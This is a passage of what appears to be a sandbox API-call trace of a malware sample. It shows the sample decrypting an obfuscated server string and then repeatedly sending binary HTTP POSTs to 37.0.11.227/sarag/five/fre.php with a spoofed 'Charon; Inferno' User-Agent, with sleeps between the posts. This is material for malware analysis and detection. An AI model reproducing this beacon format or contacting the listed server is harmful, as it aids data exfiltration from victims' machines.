RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0184.872] GetProcessHeap () returned 0x690000 [0184.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0184.873] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0184.873] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.873] GetProcessHeap () returned 0x690000 [0184.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0184.874] GetProcessHeap () returned 0x690000 [0184.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0184.874] send (s=0x324, buf=0x6abd08*, len=242, flags=0) returned 242 [0184.875] send (s=0x324, buf=0x6aba40*, len=159, flags=0) returned 159 [0184.875] GetProcessHeap () returned 0x690000 [0184.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0184.875] recv (in: s=0x324, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0184.950] GetProcessHeap () returned 0x690000 [0184.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0184.951] GetProcessHeap () returned 0x690000 [0184.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0184.951] GetProcessHeap () returned 0x690000 [0184.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0184.951] GetProcessHeap () returned 0x690000 [0184.951] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0184.952] closesocket (s=0x324) returned 0 [0184.952] GetProcessHeap () returned 0x690000 [0184.952] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0184.952] GetProcessHeap () returned 0x690000 [0184.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0184.953] GetProcessHeap () returned 0x690000 [0184.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0184.953] GetProcessHeap () returned 0x690000 [0184.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0184.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x100c) returned 0x324 [0184.956] Sleep (dwMilliseconds=0xea60) [0184.957] GetProcessHeap () returned 0x690000 [0184.957] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0184.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.963] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.971] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0184.978] GetProcessHeap () returned 0x690000 [0184.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0184.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.979] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0184.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.984] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.985] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.985] GetProcessHeap () returned 0x690000 [0184.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0184.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.987] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0184.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0184.998] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0184.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.030] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0185.033] GetProcessHeap () returned 0x690000 [0185.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.036] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.037] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.037] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.038] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.038] GetProcessHeap () returned 0x690000 [0185.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.043] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.043] GetProcessHeap () returned 0x690000 [0185.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.044] GetProcessHeap () returned 0x690000 [0185.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.044] GetProcessHeap () returned 0x690000 [0185.044] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.044] GetProcessHeap () returned 0x690000 [0185.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.045] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.051] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0185.058] GetProcessHeap () returned 0x690000 [0185.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0185.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.059] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.062] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.063] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.063] GetProcessHeap () returned 0x690000 [0185.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0185.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.066] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.067] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.068] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0185.068] GetProcessHeap () returned 0x690000 [0185.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.069] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0185.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.070] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0185.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.071] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0185.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.071] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0185.071] GetProcessHeap () returned 0x690000 [0185.071] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.071] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9ac8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0185.072] GetProcessHeap () returned 0x690000 [0185.072] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0185.072] socket (af=2, type=1, protocol=6) returned 0x328 [0185.072] connect (s=0x328, name=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0185.099] FreeAddrInfoW (pAddrInfo=0x6a9ac8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae868*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0185.099] GetProcessHeap () returned 0x690000 [0185.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0185.099] GetProcessHeap () returned 0x690000 [0185.099] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0185.100] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.100] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.100] GetProcessHeap () returned 0x690000 [0185.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0185.100] GetProcessHeap () returned 0x690000 [0185.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.101] GetProcessHeap () returned 0x690000 [0185.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0185.101] GetProcessHeap () returned 0x690000 [0185.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0185.102] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.102] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.102] GetProcessHeap () returned 0x690000 [0185.102] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0185.102] GetProcessHeap () returned 0x690000 [0185.103] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.103] send (s=0x328, buf=0x6abd08*, len=242, flags=0) returned 242 [0185.103] send (s=0x328, buf=0x6aba40*, len=159, flags=0) returned 159 [0185.104] GetProcessHeap () returned 0x690000 [0185.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0185.104] recv (in: s=0x328, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0185.174] GetProcessHeap () returned 0x690000 [0185.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.174] GetProcessHeap () returned 0x690000 [0185.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.175] GetProcessHeap () returned 0x690000 [0185.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0185.176] GetProcessHeap () returned 0x690000 [0185.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0185.176] closesocket (s=0x328) returned 0 [0185.176] GetProcessHeap () returned 0x690000 [0185.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0185.176] GetProcessHeap () returned 0x690000 [0185.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.177] GetProcessHeap () returned 0x690000 [0185.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.177] GetProcessHeap () returned 0x690000 [0185.177] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1010) returned 0x328 [0185.195] Sleep (dwMilliseconds=0xea60) [0185.196] GetProcessHeap () returned 0x690000 [0185.196] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.198] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.205] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0185.212] GetProcessHeap () returned 0x690000 [0185.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0185.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.214] CryptImportKey (in: hProv=0x6af078, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.215] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.216] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.216] GetProcessHeap () returned 0x690000 [0185.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0185.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.218] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.219] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.220] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0185.220] GetProcessHeap () returned 0x690000 [0185.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0185.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.221] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.223] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.224] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.225] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.225] GetProcessHeap () returned 0x690000 [0185.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.225] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.226] GetProcessHeap () returned 0x690000 [0185.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.226] GetProcessHeap () returned 0x690000 [0185.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.227] GetProcessHeap () returned 0x690000 [0185.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.227] GetProcessHeap () returned 0x690000 [0185.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.235] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0185.241] GetProcessHeap () returned 0x690000 [0185.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0185.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.243] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.249] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.250] GetProcessHeap () returned 0x690000 [0185.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0185.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.252] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.253] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.254] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0185.254] GetProcessHeap () returned 0x690000 [0185.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0185.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.256] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0185.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.257] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0185.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.258] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0185.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.260] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0185.260] GetProcessHeap () returned 0x690000 [0185.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0185.260] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9f28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0185.260] GetProcessHeap () returned 0x690000 [0185.261] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0185.261] socket (af=2, type=1, protocol=6) returned 0x32c [0185.261] connect (s=0x32c, name=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0185.290] FreeAddrInfoW (pAddrInfo=0x6a9f28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8c8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0185.290] GetProcessHeap () returned 0x690000 [0185.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0185.290] GetProcessHeap () returned 0x690000 [0185.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0185.290] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.291] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.291] GetProcessHeap () returned 0x690000 [0185.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0185.291] GetProcessHeap () returned 0x690000 [0185.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.292] GetProcessHeap () returned 0x690000 [0185.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0185.292] GetProcessHeap () returned 0x690000 [0185.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0185.292] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.293] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.293] GetProcessHeap () returned 0x690000 [0185.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6a91a8 [0185.293] GetProcessHeap () returned 0x690000 [0185.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.294] send (s=0x32c, buf=0x6a91a8*, len=242, flags=0) returned 242 [0185.294] send (s=0x32c, buf=0x6aba40*, len=159, flags=0) returned 159 [0185.294] GetProcessHeap () returned 0x690000 [0185.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0185.294] recv 